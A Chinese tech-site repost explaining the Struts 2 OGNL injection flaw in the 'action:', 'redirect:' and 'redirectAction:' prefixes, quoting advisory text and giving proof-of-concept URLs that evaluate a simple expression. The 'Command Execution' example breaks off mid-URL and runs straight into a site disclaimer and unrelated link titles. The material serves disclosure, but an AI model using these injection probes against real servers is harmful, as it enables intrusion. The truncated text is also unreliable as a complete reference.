?Struts 2的漏洞原理：

Struts又爆远程代码执行漏洞！在这次的漏洞中，攻击者可以通过操纵参数远程执行恶意代码。Struts?2.3.15.1之前的版本，参数action的值redirect以及redirectAction没有正确过滤，导致ognl代码执行。

?

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

?

In the Struts Blank App, open following URLs.

1. Simple Expression - the parameter names are evaluated as OGNL.

   1. http://host/struts2-blank/example/X.action?action:%25{3*4}

   2. http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

1. Command Execution

   1. http://host/struts2-blank/examp 免责声明： 本文仅代表作者个人观点，与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实，对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。 相关资料更多> apache 虚拟主机设立 Access查询与显示！多谢 windows不能在当地计算机启动apache2 :各位高人帮小弟我看看这个SELECT语句如何会这样! Apache POI 官方文档解析跟趣谈 用 Apache 跟 Subversion 搭建安全的版本控制环境 类似论坛那种按照回复量排序解决方法 请教怎么将.mdf .ldf 转换成 .cvs Apache和Tomcat配置负载均衡时遇到的有关问题 推荐阅读更多> 为什么小弟我的Apache会自动下载html 一个复杂一点的rewrite不知道如何写了 acegi集成遇到的有关问题：HTTP Status 403 - Access is denied httpd.conf最简单的有关问题，原来会，后来如何都搞不出来了 服务器ACCESS数据库连接有关问题 怎么在Windows下安装配置Apache服务器 JAVA 连 服务器FTP连接不上 [Java Web 开发],该怎么解决 一个IP地址上运行多个基于域名的web站点配置不成功？解决办法 怎么禁止apache2和mysql服务的开机自动启动 tomcat调整apache小记 CXF 的一个容易的webservice Rewrite 伪静态为什么没效果呢？解决思路 Ubuntu上搭建PHP开发环境（Apache+Mysql+PHP5） apache配置有关问题 unbuntu环境下Tomcat显示乱码解决办法 apache在windows Server 2008 上配置二级域名,该如何解决 关于org.apache.cxf.binding.soap.SoapFault: Error reading XMLStreamReader 花生殼二級域名之使用解决方法 用ado能否给链接表添加字段？该如何解决 Ubuntu apache2重启下令与主机配置文件